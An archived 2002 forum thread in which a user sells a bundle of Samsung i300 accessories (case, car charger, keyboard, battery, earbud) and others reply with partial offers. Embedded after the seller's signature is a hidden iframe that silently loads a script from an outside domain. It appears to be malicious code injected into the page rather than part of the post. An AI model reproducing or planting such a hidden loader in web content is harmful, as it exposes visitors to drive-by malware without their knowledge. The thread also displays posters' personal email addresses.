+ Reply to Thread

Arrow FS: i300 Accessories Bundle!

Well, guys (and gals) - I went ahead and utilized my CompUSA TAP warranty and exchanged my i300 for the Treo 300. At first the Treo didn't do it for me, but the more I used it, the more I liked it. Please don't hate me! Hehe...good news is, now I have a nice bundle of i300 accessories to sell...here is the list and what the regular price was for everything:

EB Slipper w/ clip - $45
    Samsung Car Power Cord - $40
    Fellowes WriteRight Screen Protectors - $25
    (only six (half) left in package)
    SnapNType i300 Mini-Keyboard - $60
    Samsung Standard Battery - $50

I paid over $275 (including shipping) for all this stuff three months ago, but I have no use for it now...everything is in the original boxes/packaging except for the cord and the battery, which I used sparingly...

I'm asking $125 (including Priority Mail shipping) for everything, which I think is a very good deal. I consider all of these things "essentials" for the i300...

Please email me at cking@idworld.net if you are interested in the package. I want to sell everything together, so please don't ask to break up the package...

Thanks for everything, I have really enjoyed this forum for the last few months...the information I have gained has been immeasurable...maybe I'll be back once the i330 comes out...hehe...

Chris King
    cking@idworld.net<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by cking; 08-26-2002 at 11:50 PM.

Since I didn't want to just bump this message back up to the top and not say anything, I guess I'll have to throw something else into the deal to get people's interest...so here goes:

The accessories package will now include a Sprint retractable earbud. This works great with the i300, and you can voice dial and answer calls all with the touch of a button!

Any interest? Email me at cking@idworld.net

CK

Cool

I will give you $20 for the keyboard....

I'm interested in the EB Slipper

I don't need the rest of the stuff, caase I already have them... $25 if it's like new? E-me @

dfrazier@clarycommunications.com
    I love my wife and my I300...don't make me choose.

I don't think he wants to break the package

Thing is it can all be bought generically on ebay for pennies on the dollar. (except the case or keyboard, hence the offer)